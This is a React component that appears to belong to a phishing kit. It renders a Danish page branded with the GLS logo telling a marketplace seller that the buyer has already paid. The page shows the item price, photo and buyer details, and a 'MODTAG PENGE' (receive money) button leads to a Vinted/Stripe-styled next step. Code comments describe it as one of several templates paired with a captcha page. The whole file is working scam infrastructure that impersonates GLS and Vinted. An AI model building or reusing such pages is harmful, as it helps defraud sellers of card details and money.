import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './GlsDkSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const GLS_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/dk-gls/gls-logo.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function ShieldCheck() {
  return (
    <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M12 2l7 4v6c0 5-3.5 9.5-7 10-3.5-.5-7-5-7-10V6l7-4z" />
      <path d="M9 12l2 2 4-5" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

/**
 * GLS (DK) — success: dansk layout + CTA → index2 (VintedStripe2).
 * Bruges sammen med VintedStripe1 (captcha) som andre service-skabeloner.
 */
function GlsDkSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'DK').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'DKK';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const address = (pageData?.delivery_address || '').trim() || '—';
  const lastName = (pageData?.last_name || '').trim() || '—';
  const firstName = (pageData?.first_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPhoto = Boolean(photoSrc && !imgFailed);

  if (loading && pageCode) {
    return (
      <div className="glsdk-wrap">
        <header className="glsdk-header">
          <img src={GLS_LOGO_SRC} alt="GLS" width={220} height={58} />
        </header>
        <main className="glsdk-main">
          <div className="glsdk-loading">Indlæser…</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="glsdk-wrap">
      <header className="glsdk-header">
        <img src={GLS_LOGO_SRC} alt="GLS" width={220} height={58} />
      </header>

      <main className="glsdk-main">
        <h1 className="glsdk-title">Modtagelse af betaling fra køberen</h1>

        <div className="glsdk-topbar">
          {showPhoto ? (
            <img
              className="glsdk-thumb-img"
              src={photoSrc}
              alt=""
              onError={() => setImgFailed(true)}
              decoding="async"
            />
          ) : (
            <div className="glsdk-thumb" aria-hidden />
          )}
          <div className="glsdk-amounts">
            <div className="glsdk-amount-top">{amountLine}</div>
            <div className="glsdk-amount-sub">{priceText === '—' ? '—' : priceText}</div>
          </div>
        </div>

        <div className="glsdk-grid">
          <section className="glsdk-card">
            <div className="glsdk-status-box">
              <span className="glsdk-dot" aria-hidden>
                ✓
              </span>
              <div>
                <p className="glsdk-status-strong">Din vare er blevet udstedt!</p>
                <p className="glsdk-status-sub">Køberen har allerede betalt for ordren.</p>
              </div>
            </div>

            <div className="glsdk-section-h">Forsendelse detaljer</div>

            <div className="glsdk-field">
              <span className="glsdk-field-label">Leveringsadresse</span>
              <input className="glsdk-input" readOnly value={address} />
            </div>

            <div className="glsdk-split2">
              <div className="glsdk-field">
                <span className="glsdk-field-label">Efternavn</span>
                <input className="glsdk-input" readOnly value={lastName} />
              </div>
              <div className="glsdk-field">
                <span className="glsdk-field-label">Fornavn</span>
                <input className="glsdk-input" readOnly value={firstName} />
              </div>
            </div>

            <p className="glsdk-legal" style={{ marginTop: 14 }}>
              Når du har modtaget pengene, bedes du sende varerne til køber i henhold til de angivne data eller aflevere
              varerne til kureren, som vil ringe tilbage til dig inden for inden for 12 timer.
            </p>
            <p className="glsdk-legal" style={{ marginTop: 10 }}>
              Efter forsendelse af varer skal du angive til køberen forsendelsesnummer! Varerne skal sendes inden for inden
              for 3 dage efter modtagelse af penge.
            </p>
          </section>

          <aside className="glsdk-card">
            <p className="glsdk-right-amount">{amountLine}</p>
            <Link to={index2Path} className="glsdk-btn">
              MODTAG PENGE
            </Link>
            <div className="glsdk-safe">
              <ShieldCheck />
              Modtagelse af betaling er sikker
            </div>
            <div className="glsdk-right-legal">
              Ved at klikke på knappen &quot;MODTAG PENGE&quot; accepterer du vilkårene og betingelserne i Brugerafkalen ved at
              bruge den online tjeneste &quot;Sikker tilbud&quot;.
            </div>
          </aside>
        </div>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default GlsDkSuccess;

